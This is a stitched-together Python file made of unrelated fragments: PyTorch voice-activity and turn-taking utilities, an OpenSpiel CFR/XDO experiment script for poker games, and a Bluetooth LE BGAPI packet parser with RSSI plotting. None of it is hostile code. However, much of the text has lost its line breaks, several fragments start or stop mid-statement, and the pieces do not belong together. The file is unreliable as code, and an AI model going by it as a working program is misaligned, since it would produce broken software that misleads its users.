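# merged == {'foobar': {'toto': 'tata', 'toto2': 'arg', 'toto3': 'arg2'},
#            'titi': 'tutu', 'bar': 'toto'}
# Note that dictupdate mutates its first argument; copy_dictupdate() deep-copies
# both dicts first when that is not wanted.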
import torch import torch.nn.functional as F from einops import rearrange def time_to_frames(time, frame_hz): if isinstance(time, list): time = torch.tensor(time) frame = time * frame_hz if isinstance(frame, torch.Tensor): frame = frame.long().tolist() else: frame = int(frame) return frame def frame2time(f, frame_time): return f * frame_time def time2frames(t, hop_time): return int(t / hop_time) def find_island_idx_len(x): """ Finds patches of the same value. starts_idx, duration, values = find_island_idx_len(x) e.g: ends = starts_idx + duration s_n = starts_idx[values==n] ends_n = s_n + duration[values==n] # find all patches with N value """ assert x.ndim == 1 n = len(x) y = x[1:] != x[:-1] # pairwise unequal (string safe) i = torch.cat( (torch.where(y)[0], torch.tensor(n - 1, device=x.device).unsqueeze(0)) ).long() it = torch.cat((torch.tensor(-1, device=x.device).unsqueeze(0), i)) dur = it[1:] - it[:-1] idx = torch.cumsum( torch.cat((torch.tensor([0], device=x.device, dtype=torch.long), dur)), dim=0 )[ :-1 ] # positions return idx, dur, x[i] def find_label_match(source_idx, target_idx): match = torch.where(source_idx.unsqueeze(-1) == target_idx) midx = target_idx[match[-1]] # back to original idx frames = torch.zeros_like(source_idx) # Does not work on gpu: frames[match[:-1]] = 1.0 frames[match[:-1]] = torch.ones_like(match[0]) return frames, midx def get_dialog_states(vad) -> torch.Tensor: """Vad to the full state of a 2 person vad dialog 0: only speaker 0 1: none 2: both 3: only speaker 1 """ assert vad.ndim >= 1 return (2 * vad[..., 1] - vad[..., 0]).long() + 1 def last_speaker_single(s): start, _, val = find_island_idx_len(s) # exlude silences (does not effect last_speaker) # silences should be the value of the previous speaker sil_idx = torch.where(val == 1)[0] if len(sil_idx) > 0: if sil_idx[0] == 0: val[0] = 2 # 2 is both we don't know if its a shift or hold sil_idx = sil_idx[1:] val[sil_idx] = val[sil_idx - 1] # map speaker B state (=3) to 1 val[val == 3] = 1 # get repetition lengths repeat = start[1:] - start[:-1] # Find difference between original and repeated # and use diff to repeat the last speaker until the end of segment diff = len(s) - repeat.sum(0) repeat = torch.cat((repeat, diff.unsqueeze(0))) # repeat values to create last speaker over entire segment last_speaker = torch.repeat_interleave(val, repeat) return last_speaker def get_last_speaker(vad, ds): assert vad.ndim > 1, "must provide vad of size: (N, channels) or (B, N, channels)" # get last active speaker (for turn shift/hold) if vad.ndim < 3: last_speaker = last_speaker_single(ds) else: # (B, N, Channels) = (B, N, n_speakers) last_speaker = [] for b in range(vad.shape[0]): s = ds[b] last_speaker.append(last_speaker_single(s)) last_speaker = torch.stack(last_speaker) return last_speaker def vad_list_to_onehot(vad_list, hop_time, duration, channel_last=False): n_frames = time2frames(duration, hop_time) + 1 if isinstance(vad_list[0][0], list): vad_tensor = torch.zeros((len(vad_list), n_frames)) for ch, ch_vad in enumerate(vad_list): for v in ch_vad: s = time2frames(v[0], hop_time) e = time2frames(v[1], hop_time) vad_tensor[ch, s:e] = 1.0 else: vad_tensor = torch.zeros((1, n_frames)) for v in vad_list: s = time2frames(v[0], hop_time) e = time2frames(v[1], hop_time) vad_tensor[:, s:e] = 1.0 if channel_last: vad_tensor = vad_tensor.permute(1, 0) return vad_tensor def vad_to_dialog_vad_states(vad) -> torch.Tensor: """Vad to the full state of a 2 person vad dialog 0: only speaker 0 1: none 2: both 3: only speaker 1 """ 
assert vad.ndim >= 1 return (2 * vad[..., 1] - vad[..., 0]).long() + 1 def mutual_silences(vad, ds=None): if ds is None: ds = vad_to_dialog_vad_states(vad) return ds == 1 def get_current_vad_onehot(vad, end, duration, speaker, frame_size): """frame_size in seconds""" start = end - duration n_frames = int(duration / frame_size) vad_oh = torch.zeros((2, n_frames)) for ch, ch_vad in enumerate(vad): for s, e in ch_vad: if start <= s <= end: rel_start = s - start v_start_frame = round(rel_start / frame_size) if start <= e <= end: # vad segment completely in chunk rel_end = e - start v_end_frame = round(rel_end / frame_size) vad_oh[ch, v_start_frame : v_end_frame + 1] = 1.0 else: # only start in chunk -> fill until end vad_oh[ch, v_start_frame:] = 1.0 elif start <= e <= end: # only end in chunk rel_end = e - start v_end_frame = round(rel_end / frame_size) vad_oh[ch, : v_end_frame + 1] = 1.0 elif s > end: break # current speaker is always channel 0 if speaker == 1: vad_oh = torch.stack((vad_oh[1], vad_oh[0])) return vad_oh def get_next_speaker(vad, ds): """Doing `get_next_speaker` in reverse""" # Reverse Vad vad_reversed = vad.flip(dims=(1,)) ds_reversed = ds.flip(dims=(1,)) # get "last speaker" next_speaker = get_last_speaker(vad_reversed, ds_reversed) # reverse back next_speaker = next_speaker.flip(dims=(1,)) return next_speaker def get_hold_shift_onehot(vad): ds = vad_to_dialog_vad_states(vad) prev_speaker = get_last_speaker(vad, ds) next_speaker = get_next_speaker(vad, ds) silence_ids = torch.where(vad.sum(-1) == 0) hold_one_hot = torch.zeros_like(prev_speaker) shift_one_hot = torch.zeros_like(prev_speaker) hold = prev_speaker[silence_ids] == next_speaker[silence_ids] hold_one_hot[silence_ids] = hold.long() shift_one_hot[silence_ids] = torch.logical_not(hold).long() return hold_one_hot, shift_one_hot # vad context history def get_vad_condensed_history(vad, t, speaker, bin_end_times=[60, 30, 15, 5, 0]): """ get the vad-condensed-history over the history of the dialog. the amount of active seconds are calculated for each speaker in the segments defined by `bin_end_times` (starting from 0). The idea is to represent the past further away from the current moment in time more granularly. for example: bin_end_times=[60, 30, 10, 5, 0] extracts activity for each speaker in the intervals: [-inf, t-60] [t-60, t-30] [t-30, t-10] [t-10, t-5] [t-50, t] The final representation is then the ratio of activity for the relevant `speaker` over the total activity, for each bin. if there is no activity, that is the segments span before the dialog started or (unusually) both are silent, then we set the ratio to 0.5, to indicate equal participation. 
Argument: - vad: list: [[(0, 3), (4, 6), ...], [...]] list of list of channel start and end time """ n_bins = len(bin_end_times) T = t - torch.tensor(bin_end_times) bin_times = [0] + T.tolist() bins = torch.zeros(2, n_bins) for ch, ch_vad in enumerate(vad): # iterate over each channel s = bin_times[0] for i, e in enumerate(bin_times[1:]): # iterate over bin segments if e < 0: # skip if before dialog start s = e # update continue for vs, ve in ch_vad: # iterate over channel VAD if vs >= s: # start inside bin time if vs < e and ve <= e: # both vad_start/end occurs in segment bins[ch][i] += ve - vs elif vs < e: # only start occurs in segment bins[ch][i] += e - vs elif ( vs > e ): # all starts occus after bin-end -> no need to process further break else: # vs is before segment if s <= ve <= e: # ending occurs in segment bins[ch][i] += ve - s # update bin start s = e # Avoid nan -> for loop # get the ratio of the relevant speaker # if there is no information (bins are before dialog start) we use an equal prior (=.5) ratios = torch.zeros(n_bins) for b in range(n_bins): binsum = bins[:, b].sum() if binsum > 0: ratios[b] = bins[speaker, b] / binsum else: ratios[b] = 0.5 # equal prior for segments with no one speaking return ratios @torch.no_grad() def get_activity_history(vad_frames, bin_end_frames, channel_last=True): """ Uses convolutions to sum the activity over each segment of interest. The kernel size is set to be the number of frames of any particular segment i.e. --------------------------------------------------- ``` ... h0 | h1 | h2 | h3 | h4 + distant past | | | | + -inf -> -t0 | | | | + ``` --------------------------------------------------- Arguments: vad_frames: torch.tensor: (Channels, N_Frames) or (N_Frames, Channels) bin_end_frames: list: boundaries for the activity history windows i.e. [6000, 3000, 1000, 500] channel_last: bool: if true we expect `vad_frames` to be (N_Frames, Channels) Returns: ratios: torch.tensor: (Channels, N_frames, bins) or (N_frames, bins, Channels) (dependent on `channel_last`) history_bins: torch.tesnor: same size as ratio but contains the number of active frames, over each segment, for both speakers. """ N = vad_frames.shape[0] if channel_last: vad_frames = rearrange(vad_frames, "n c -> c n") # container for the activity of the defined bins hist_bins = [] # Distance past activity history/ratio # The segment from negative infinity to the first bin_end_frames if vad_frames.shape[0] > bin_end_frames[0]: h0 = vad_frames[:, : -bin_end_frames[0]].cumsum(dim=-1) diff_pad = torch.ones(2, bin_end_frames[0]) * -1
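# Small usage sketch for the VAD helpers above (segment times below are made up; the
# original file continues past this point with the rest of get_activity_history).
import torch

vad_list = [[[0.0, 1.0], [2.0, 3.0]],   # speaker 0 active segments, in seconds
            [[1.2, 1.9]]]               # speaker 1 active segments
vad = vad_list_to_onehot(vad_list, hop_time=0.05, duration=3.0, channel_last=True)
# vad: (n_frames, 2) one-hot activity per 50 ms frame

ds = get_dialog_states(vad)                              # per-frame state: 0/1/2/3
hold, shift = get_hold_shift_onehot(vad.unsqueeze(0))    # (1, n_frames) each, set on silent frames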
from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import sys import xdo import time import pyspiel import argparse import datetime import numpy as np from tqdm import tqdm from dependencies.open_spiel.python import policy from dependencies.open_spiel.python.algorithms import cfr from dependencies.open_spiel.python.algorithms import psro_oracle from dependencies.open_spiel.python.algorithms import best_response from dependencies.open_spiel.python.algorithms import exploitability from dependencies.open_spiel.python.algorithms import get_all_states from dependencies.open_spiel.python.algorithms import fictitious_play from dependencies.open_spiel.python.algorithms import expected_game_score from dependencies.open_spiel.python.algorithms.cfr_cfr import OnlineTraining from dependencies.open_spiel.python.algorithms import external_sampling_mccfr as external_mccfr module_path = os.path.abspath(os.path.join('')) if module_path not in sys.path: sys.path.append(module_path) def ensure_dir(file_path): directory = os.path.dirname(file_path) if not os.path.exists(directory): os.makedirs(directory, exist_ok=True) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-g', '--game_name', type=str, required=False, default="leduc_poker", choices=["leduc_poker", "kuhn_poker", "leduc_poker_dummy", "oshi_zumo"]) parser.add_argument('-a', '--algorithm', required=False, default="xodo", type=str, choices=["psro", "cfr", "xfp", "xdo", "xodo_eps", "lcfr_plus", "xodo", "lcfr", "xodo_eps", "lcfr_plus_eps", "cfr_eps"]) parser.add_argument('-m', '--meta_solver', required=False, default="lcfr_plus", type=str, choices=["outcome", "external", "xfp", "lcfr_plus", "cfr"]) parser.add_argument('-r', '--random_br', default="False", type=str, choices=["True", "False"]) parser.add_argument('-o', '--old', default="False", type=str, choices=["True", "False"]) parser.add_argument('-i', '--iterations', default=100000000, type=int) parser.add_argument('-x', '--xodo_iterations', default=50, type=int) # Parse arguments commandline_args = parser.parse_args() iterations = commandline_args.iterations xodo_iterations = commandline_args.xodo_iterations algorithm = commandline_args.algorithm game_name = commandline_args.game_name meta_solver = commandline_args.meta_solver random_max_br = commandline_args.random_br old_schedule = commandline_args.old if old_schedule: starting_br_conv_threshold = 2 ** 4 else: starting_br_conv_threshold = 0.05 extra_info = datetime.datetime.now().strftime("%I.%M.%S%p_%b-%d-%Y") # Set up game environment if game_name == "oshi_zumo": COINS = 4 SIZE = 1 HORIZON = 6 game = pyspiel.load_game(game_name, { "coins": pyspiel.GameParameter(COINS), "size": pyspiel.GameParameter(SIZE), "horizon": pyspiel.GameParameter(HORIZON) }) game = pyspiel.convert_to_turn_based(game) pretty_game_name = f'{game_name}c{COINS}s{SIZE}h{HORIZON}' else: game = pyspiel.load_game(game_name) pretty_game_name = game_name def run(solver, iterations): checkpoint_period = 5 if algorithm == 'external_mccfr': checkpoint_period = 15000 start_time = time.time() times = [] exps = [] episodes = [] cfr_infostates = [] if algorithm == 'psro': size_of_game = len(get_all_states.get_all_states(game, include_chance_states=True)) num_infostates_expanded = size_of_game * 2 for i in range(iterations): if algorithm in ['cfr', 'lcfr_plus', 'lcfr']: solver.evaluate_and_update_policy() else: solver.iteration() if i % checkpoint_period == 0: if algorithm in ['cfr', 
'lcfr_plus', 'lcfr']: average_policy = solver.average_policy() elif algorithm == 'external_mccfr': try: average_policy = solver.average_policy() except AttributeError: print('making tabular policy from callable') average_policy = policy.tabular_policy_from_callable(game, solver.callable_avg_policy()) print('done') elif algorithm == 'xfp': average_policy = solver.average_policy() elif algorithm == 'psro': average_policy = solver._current_policy num_infostates_expanded += size_of_game * 2 else: raise ValueError(f"Unknown algorithm name: {algorithm}") print('beginning exploitability calculation') conv = exploitability.exploitability(game, average_policy) print("Iteration {} exploitability {}".format(i, conv)) elapsed_time = time.time() - start_time print(elapsed_time) times.append(elapsed_time) exps.append(conv) episodes.append(i) save_prefix = './results/' + algorithm + '_' + pretty_game_name + extra_info ensure_dir(save_prefix) print(f"saving to: {save_prefix + '_times.npy'}") np.save(save_prefix + '_times', np.array(times)) print(f"saving to: {save_prefix + '_exps.npy'}") np.save(save_prefix + '_exps', np.array(exps)) print(f"saving to: {save_prefix + '_episodes.npy'}") np.save(save_prefix + '_episodes', np.array(episodes)) if algorithm in ['cfr', 'external_mccfr', 'lcfr_plus', 'lcfr', 'xfp']: cfr_infostates.append(solver.num_infostates_expanded * (i + 1)) print("Num infostates expanded (mil): ", solver.num_infostates_expanded * (i + 1) / 1e6) print(f"saving to: {save_prefix + '_infostates.npy'}") np.save(save_prefix + '_infostates', np.array(cfr_infostates)) elif algorithm in ['psro']: cfr_infostates.append(num_infostates_expanded) print("Num infostates expanded (mil): ", num_infostates_expanded / 1e6) print(f"saving to: {save_prefix + '_infostates.npy'}") np.save(save_prefix + '_infostates', np.array(cfr_infostates)) if algorithm == 'cfr': solver = cfr.CFRSolver(game) run(solver, iterations) elif algorithm == 'lcfr': solver = cfr.LCFRSolver(game) run(solver, iterations) elif algorithm == 'lcfr_plus': # In the implementation of OpSpiel, CFRPlusSolver is LCFR+ solver = cfr.CFRPlusSolver(game) run(solver, iterations) elif algorithm == 'external_mccfr': solver = external_mccfr.ExternalSamplingSolver(game) run(solver, iterations) elif algorithm == 'xfp': solver = fictitious_play.XFPSolver(game) run(solver, iterations) elif algorithm == 'xdo': # brs = [] xdo_iterations = 50 if meta_solver == 'external': xdo_iterations = 200 elif meta_solver == 'xfp': xdo_iterations = 5 inner_thresh = .35 info_test = [] size_of_game = len(get_all_states.get_all_states(game, include_chance_states=True)) uniform = policy.UniformRandomPolicy(game) br_list = [] for pid in [0, 1]: br_list.append([best_response.BestResponsePolicy(game, pid, uniform)]) ############################### start_time = time.time() cum_brtime = 0 xdo_times = [] xdo_exps = [] xdo_episodes = [] xdo_infostates = [] xdo_brtimes = [] xdo_outers = [] xdo_res_game_size = [] br_conv_threshold = starting_br_conv_threshold outer_loop = 0 episode = 0 # num_infostates = 0 nash_support_reached = False prev_cum_num_infostates = 0 num_infostates = 0 for i in range(iterations): print('Iteration: ', i) restricted_game = xdo.WrappedGame(game, br_list) if meta_solver == 'external': solver = external_mccfr.ExternalSamplingSolver(restricted_game, external_mccfr.AverageType.SIMPLE) elif meta_solver == 'xfp': solver = fictitious_play.XFPSolver(restricted_game) elif meta_solver == 'lcfr_plus': solver = cfr.CFRPlusSolver(restricted_game) elif meta_solver == 'cfr': 
solver = cfr.CFRSolver(restricted_game) double_next_time = False while True: for inner_loop_iter in tqdm(range(int(xdo_iterations))): episode += 1 if meta_solver in ['cfr', 'lcfr_plus']: solver.evaluate_and_update_policy() else: solver.iteration() restricted_exploitability = exploitability.nash_conv(restricted_game, solver.average_policy()) / 2 print(f'inner loop (restricted) exploitability: {restricted_exploitability}') # if nash_support_reached: # total_exploitability = exploitability.nash_conv(()) # total_exploitability = 0 ############################ # make BRs and save data if old_schedule: if restricted_exploitability < br_conv_threshold and i > 0: br_conv_threshold /= 2 break print('making full policy') full_policy = xdo.LazyTabularPolicy(restricted_game, game, solver.average_policy()) print('making new brs') brtime_start = time.time() avg_exploitability = 0 new_brs = [] for pid in [0, 1]: new_br = best_response.BestResponsePolicy(game, pid, full_policy, add_noise=random_max_br) new_brs.append(new_br) avg_exploitability += new_br.value(game.new_initial_state()) / 2 brtime_end = time.time() cum_brtime += brtime_end - brtime_start print(f'avg (full) exploitability: {avg_exploitability}') elapsed_time = time.time() - start_time print('Total elapsed time: ', elapsed_time) save_prefix = './results/' + algorithm + '_' + meta_solver + '_' + game_name + str( old_schedule) + extra_info if meta_solver in ['cfr', 'lcfr_plus', 'external', 'xfp']: # num_infostates = prev_cum_num_infostates + solver.num_infostates_expanded num_infostates += solver.num_infostates_expanded * xdo_iterations xdo_infostates.append(num_infostates) print('Num infostates expanded (mil): ', num_infostates / 1e6) print(f"saving to: {save_prefix + '_infostates.npy'}") np.save(save_prefix + '_infostates', np.array(xdo_infostates)) else: num_infostates = 0 restricted_game_size = len(get_all_states.get_all_states(restricted_game, include_chance_states=True)) xdo_times.append(elapsed_time) xdo_exps.append(avg_exploitability) xdo_episodes.append(episode) xdo_brtimes.append(cum_brtime) xdo_outers.append(outer_loop) xdo_res_game_size.append(restricted_game_size) print(f'outer loop: {outer_loop}, restricted game size: {restricted_game_size}') ensure_dir(save_prefix) print(f"saving to: {save_prefix + '_times.npy'}") np.save(save_prefix + '_times', np.array(xdo_times)) print(f"saving to: {save_prefix + '_exps.npy'}") np.save(save_prefix + '_exps', np.array(xdo_exps)) print(f"saving to: {save_prefix + '_episodes.npy'}") np.save(save_prefix + '_episodes', np.array(xdo_episodes)) print(f"saving to: {save_prefix + '_brtimes.npy'}") np.save(save_prefix + '_brtimes', np.array(xdo_brtimes)) print(f"saving to: {save_prefix + '_outers.npy'}") np.save(save_prefix + '_outers', np.array(xdo_outers)) print(f"saving to: {save_prefix + '_res_game_size.npy'}") np.save(save_prefix + '_res_game_size', np.array(xdo_res_game_size)) ############################### if avg_exploitability != restricted_exploitability: if abs(avg_exploitability - restricted_exploitability) < 0.00001: print( "EXPLOITABILITY IS DIFFERENT BUT BELOW ALLOWABLE TOLERANCE! 
THIS IS WRONG IF IT CONTINUES HAPPENING") continue print("no support :((((((((((((((((((((((") if restricted_exploitability > inner_thresh: xdo_iterations = int(xdo_iterations * 1.4) continue else: for pid in [0, 1]: br_list[pid].append(new_brs[pid]) # num_infostates += len(new_brs[pid].cache_value) # print(len(new_brs[pid].cache_value)) num_infostates += size_of_game outer_loop += 1 print(f"adding brs: brs explore {size_of_game} infostates each") prev_cum_num_infostates = num_infostates inner_thresh *= 0.98 print(f"inner loop exploitability threshold set to {inner_thresh}") break else: print("has full support!!!!!!!!!!!!!!!") xdo_iterations = int(xdo_iterations * 1.02) elif algorithm == 'xodo': size_of_game = len(get_all_states.get_all_states(game, include_chance_states=True)) brs, info_test = [], [] br_actions = {} start_time = time.time() uniform = policy.UniformRandomPolicy(game) for pid in range(2): br = best_response.BestResponsePolicy(game, pid, uniform, add_noise=random_max_br) _ = br.value(game.new_initial_state()) for key, action in br.cache_best_response_action.items(): br_actions[key] = [action] brs.append(br) new_br = True br_list = [[brs[0]], [brs[1]]] restricted_game = xdo.WrappedGame(game, br_list) if meta_solver == 'external': solver = external_mccfr.ExternalSamplingSolver(restricted_game, external_mccfr.AverageType.SIMPLE) elif meta_solver == 'xfp': solver = fictitious_play.XFPSolver(restricted_game) elif meta_solver == 'lcfr_plus': solver = cfr.CFRPlusSolver(restricted_game) elif meta_solver == 'cfr': solver = cfr.CFRSolver(restricted_game) xdo_times = [] xdo_exps = [] xdo_exps_brtimes = [] xdo_episodes = [] xdo_infostates = [] episode = 0 num_infostates = 0 num_infostates_prev_iteration = 0 for i in range(iterations): print('Iteration: ', i) full_policy = xdo.LazyTabularPolicy(restricted_game, game, solver.average_policy()) conv = exploitability.exploitability(game, full_policy) save_prefix = './results/' + algorithm + '_' + meta_solver + '_' + game_name + extra_info if (new_br and i > 0) or i % 5 == 0: check_start = time.time() start_time += (time.time() - check_start) print("Iteration {} exploitability {}".format(i, conv)) elapsed_time = time.time() - start_time print('Total elapsed time: ', elapsed_time) num_infostates += solver.num_infostates_expanded * xodo_iterations num_infostates_prev_iteration = solver.num_infostates_expanded print('Num infostates expanded (mil): ', num_infostates / 1e6) xdo_times.append(elapsed_time) xdo_exps.append(conv) xdo_episodes.append(episode) xdo_infostates.append(num_infostates) ensure_dir(save_prefix) print(f"saving to: {save_prefix + '_times.npy'}") np.save(save_prefix + '_times', np.array(xdo_times)) print(f"saving to: {save_prefix + '_exps.npy'}") np.save(save_prefix + '_exps', np.array(xdo_exps)) print(f"saving to: {save_prefix + '_episodes.npy'}") np.save(save_prefix + '_episodes', np.array(xdo_episodes)) print(f"saving to: {save_prefix + '_infostates.npy'}") np.save(save_prefix + '_infostates', np.array(xdo_infostates)) if new_br and i > 0: num_infostates_prev_iteration = 0 restricted_game = xdo.WrappedGame(game, br_list) if meta_solver == 'external': solver = external_mccfr.ExternalSamplingSolver(restricted_game, external_mccfr.AverageType.SIMPLE) elif meta_solver == 'xfp': solver = fictitious_play.XFPSolver(restricted_game) elif meta_solver == 'lcfr_plus': solver = cfr.CFRPlusSolver(restricted_game) else: solver = cfr.CFRSolver(restricted_game) for _ in tqdm(range(xodo_iterations)): if meta_solver in ['cfr', 'lcfr_plus']: 
solver.evaluate_and_update_policy() else: solver.iteration() new_brs = [] new_br = False full_policy = xdo.LazyTabularPolicy(restricted_game, game, solver.average_policy()) for pid in range(2): br = best_response.BestResponsePolicy(game, pid,
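# Invocation sketch for the experiment script above (the xodo branch is truncated
# mid-statement here). Only flags actually declared in the argparse block are used;
# the file name run_xdo.py is a placeholder since the real name is not shown:
#
#   python run_xdo.py -g leduc_poker -a xdo -m lcfr_plus -x 50 -i 1000
#   python run_xdo.py -g kuhn_poker  -a cfr -i 1000
#
# Results (times, exploitabilities, episodes, infostate counts) are written as .npy
# arrays under ./results/ with the algorithm, meta-solver and game name in the prefix.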
while (ser.inWaiting()): bgapi_parse_csv(ord(ser.read())); # else: # if options.quiet and options.friendly and options.csv : # while (ser.inWaiting()): bgapi_parse_csv(ord(ser.read())); # else: # while (ser.inWaiting()): bgapi_parse(ord(ser.read())); while (ser.inWaiting()): bgapi_parse_plot(ord(ser.read())); # don't burden the CPU time.sleep(0.0001) # thanks to <NAME> for Python event handler code # http://www.emptypage.jp/notes/pyevent.en.html class BGAPIEvent(object): def __init__(self, doc=None): self.__doc__ = doc def __get__(self, obj, objtype=None): if obj is None: return self return BGAPIEventHandler(self, obj) def __set__(self, obj, value): pass class BGAPIEventHandler(object): def __init__(self, event, obj): self.event = event self.obj = obj def _getfunctionlist(self): """(internal use) """ try: eventhandler = self.obj.__eventhandler__ except AttributeError: eventhandler = self.obj.__eventhandler__ = {} return eventhandler.setdefault(self.event, []) def add(self, func): """Add new event handler function. Event handler function must be defined like func(sender, earg). You can add handler also by using '+=' operator. """ self._getfunctionlist().append(func) return self def remove(self, func): """Remove existing event handler function. You can remove handler also by using '-=' operator. """ self._getfunctionlist().remove(func) return self def fire(self, earg=None): """Fire event and call all handler functions You can call EventHandler object itself like e(earg) instead of e.fire(earg). """ for func in self._getfunctionlist(): func(self.obj, earg) __iadd__ = add __isub__ = remove __call__ = fire #================================================================================================================================================== #================================================================================================================================================== #================================================================================================================================================== #===================================================== # # define API commands we might use for this script # #===================================================== def ble_cmd_system_reset(p, boot_in_dfu): p.write(struct.pack('5B', 0, 1, 0, 0, boot_in_dfu)) def ble_cmd_connection_disconnect(p, connection): p.write(struct.pack('5B', 0, 1, 3, 0, connection)) def ble_cmd_gap_set_mode(p, discover, connect): p.write(struct.pack('6B', 0, 2, 6, 1, discover, connect)) def ble_cmd_gap_end_procedure(p): p.write(struct.pack('4B', 0, 0, 6, 4)) def ble_cmd_gap_set_scan_parameters(p, scan_interval, scan_window, active): p.write(struct.pack('<4BHHB', 0, 5, 6, 7, scan_interval, scan_window, active)) def ble_cmd_gap_discover(p, mode): p.write(struct.pack('5B', 0, 1, 6, 2, mode)) #===================================================== #===================================================== # define basic BGAPI parser bgapi_rx_buffer = [] bgapi_rx_expected_length = 0 def bgapi_parse_plot(b): global bgapi_rx_buffer, bgapi_rx_expected_length, df, ax, instr_search, byte_switch, byte_position_ , df_byte, bx data_packet=None select_byte_data_as_str=None select_byte_date_as_int=None if len(bgapi_rx_buffer) == 0 and (b == 0x00 or b == 0x80): bgapi_rx_buffer.append(b) elif len(bgapi_rx_buffer) == 1: bgapi_rx_buffer.append(b) bgapi_rx_expected_length = 4 + (bgapi_rx_buffer[0] & 0x07) + bgapi_rx_buffer[1] elif len(bgapi_rx_buffer) > 1: bgapi_rx_buffer.append(b) #print '%02X: %d, %d' % 
(b, len(bgapi_rx_buffer), bgapi_rx_expected_length) if bgapi_rx_expected_length > 0 and len(bgapi_rx_buffer) == bgapi_rx_expected_length: #print '<=[ ' + ' '.join(['%02X' % b for b in bgapi_rx_buffer ]) + ' ]' packet_type, payload_length, packet_class, packet_command = bgapi_rx_buffer[:4] bgapi_rx_payload = bytes(bgapi_rx_buffer[4:]) if packet_type & 0x80 == 0x00: # response bgapi_filler = 0 else: # event if packet_class == 0x06: # gap if packet_command == 0x00: # scan_response rssi, packet_type, sender, address_type, bond, data_len = struct.unpack('<bB6sBBB', bgapi_rx_payload[:11]) sender = [b for b in sender] data_data = [b for b in bgapi_rx_payload[11:]] display = 1 # parse all ad fields from ad packet ad_fields = [] this_field = [] ad_flags = 0 ad_services = [] ad_local_name = [] ad_tx_power_level = 0 ad_manufacturer = [] bytes_left = 0 for b in data_data: if bytes_left == 0: bytes_left = b this_field = [] else: this_field.append(b) bytes_left = bytes_left - 1 if bytes_left == 0: ad_fields.append(this_field) if this_field[0] == 0x01: # flags ad_flags = this_field[1] if this_field[0] == 0x02 or this_field[0] == 0x03: # partial or complete list of 16-bit UUIDs # for i in xrange((len(this_field) - 1) / 2): for i in range(int((len(this_field) - 1) / 2)): ad_services.append(this_field[-1 - i*2 : -3 - i*2 : -1]) if this_field[0] == 0x04 or this_field[0] == 0x05: # partial or complete list of 32-bit UUIDs # for i in xrange((len(this_field) - 1) / 4): for i in range(int((len(this_field) - 1) / 4)): ad_services.append(this_field[-1 - i*4 : -5 - i*4 : -1]) if this_field[0] == 0x06 or this_field[0] == 0x07: # partial or complete list of 128-bit UUIDs # for i in xrange((len(this_field) - 1) / 16): for i in range(int((len(this_field) - 1) / 16)): ad_services.append(this_field[-1 - i*16 : -17 - i*16 : -1]) if this_field[0] == 0x08 or this_field[0] == 0x09: # shortened or complete local name ad_local_name = this_field[1:] if this_field[0] == 0x0A: # TX power level ad_tx_power_level = this_field[1] # OTHER AD PACKET TYPES NOT HANDLED YET if this_field[0] == 0xFF: # manufactuerer specific data ad_manufacturer.append(this_field[1:]) if len(filter_mac) > 0: match = 0 for mac in filter_mac: if mac == sender[:-len(mac) - 1:-1]: match = 1 break if match == 0: display = 0 if display and len(filter_uuid) > 0: if not [i for i in filter_uuid if i in ad_services]: display = 0 if display and filter_rssi > 0: if -filter_rssi > rssi: display = 0 data_packet="" data_packet=str(data_packet.join(['%02X' % b for b in data_data])) # print ( " Data packet : " + data_packet + " instr search :: " + instr_search) ## debug line select_byte_data_as_int=None #------------------------------------------------------------------------------------------------------------------- #------------------------------------------------------------------------------------------------------------------- #------------------------------------------------------------------------------------------------------------------- if display and len(instr_search)>0 : if (data_packet.find(instr_search) > -1) : #------------------------------------------------------------------------------------------------------------------- #------------------------------------------------------------------------------------------------------------------- if (byte_position_ > -1 ) : select_byte_data_as_str=data_packet[ byte_position_ : ( byte_position_ +2 )] if (all(c in string.hexdigits for c in select_byte_data_as_str)) : #check that the selected data at byte_position 
is valid hex data select_byte_data_as_int=int(select_byte_data_as_str, 16) # print("Raw packet data :: " + data_packet) # Debug # print("byte to pick up from payload_status is :: " + str(byte_position_) + "recovered data :: " + select_byte_data_as_str) # print("recovered data :: " + str(select_byte_data_as_int)) if byte_switch == True : #------------------------------------------------------------------------------------------------------------------- # If there is conversion method to convert the selected byte to a RSSI value it should # added here #------------------------------------------------------------------------------------------------------------------- rssi = select_byte_data_as_int else : if byte_switch == True : byte_switch = False t = datetime.datetime.now() t_now= float("%ld.%03ld" % (time.mktime(t.timetuple()), t.microsecond/1000)) t_start=float("%ld.%03ld" % (time.mktime(start_time.timetuple()), start_time.microsecond/1000)) t_run=t_now-t_start disp_list = [] for c in options.display: if c == 't': if options.time_in_ms: disp_list.append("%f" % t_run ) if not(options.time_in_ms): disp_list.append("%ld.%03ld" % (time.mktime(t.timetuple()), t.microsecond/1000) ) elif c == 'r': disp_list.append("%d" % rssi) elif c == 'p': disp_list.append("%d" % packet_type) elif c == 's': disp_list.append("%s" % ''.join(['%02X' % b for b in sender[::-1]])) elif c == 'a': disp_list.append("%d" % address_type) elif c == 'b': disp_list.append("%d" % bond) elif c == 'd': disp_list.append("%s" % ''.join(['%02X' % b for b in data_data])) #disp_list.append("%s" % ''.join([data_packet])) if options.csv : if options.byte : op_str= "\"" + remove('\";\"'.join(disp_list)) + "\"" + ';\"' + str(select_byte_data_as_int) + "\"" else : op_str= "\"" + remove('\";\"'.join(disp_list)) + "\"" print(op_str) else: if (options.comma or not(options.comma)) and not(options.csv): if options.byte : op_str= " " + remove(', '.join(disp_list)) + "," + str(select_byte_data_as_int) else : op_str= " " + remove(', '.join(disp_list)) + "" print(op_str) # print "gap_scan_response: rssi: %d, packet_type: %d, sender: %s, address_type: %d, bond: %d, data_len: %d" % \ # (rssi, packet_type, ':'.join(['%02X' % ord(b) for b in sender[::-1]]), address_type, bond, data_len) # #------------------------------------------------------------------------------------------------------------------- # # Real time graph plotting routine # # #------------------------------------------------------------------------------------------------------------------- # receive python object if options.plot and options.time_in_ms : # print ("Raw data :: " , t_run, rssi ) #print(op_str) row =pd.DataFrame({'x':[t_run] ,'y':[rssi]}) df = pd.concat([df, row]) #df = pd.append([df, row]) # print ("df :: " , df ) # print (df.dtypes) #plot all data ax.plot(df['x'] ,df['y'], color='r') # show the plot plt.show() plt.pause(0.0001) # <-- sets the current plot until refreshed # #------------------------------------------------------------------------------------------------------------------- if options.instr and options.byte and options.plotbyte and options.time_in_ms : # print ("Raw data :: " , t_run, rssi ) #print(op_str) row2 =pd.DataFrame({'x':[t_run] ,'y':[select_byte_data_as_int]}) df_byte = pd.concat([df_byte, row2]) #df = pd.append([df, row]) # print ("df :: " , df ) # print (df.dtypes) #plot all data 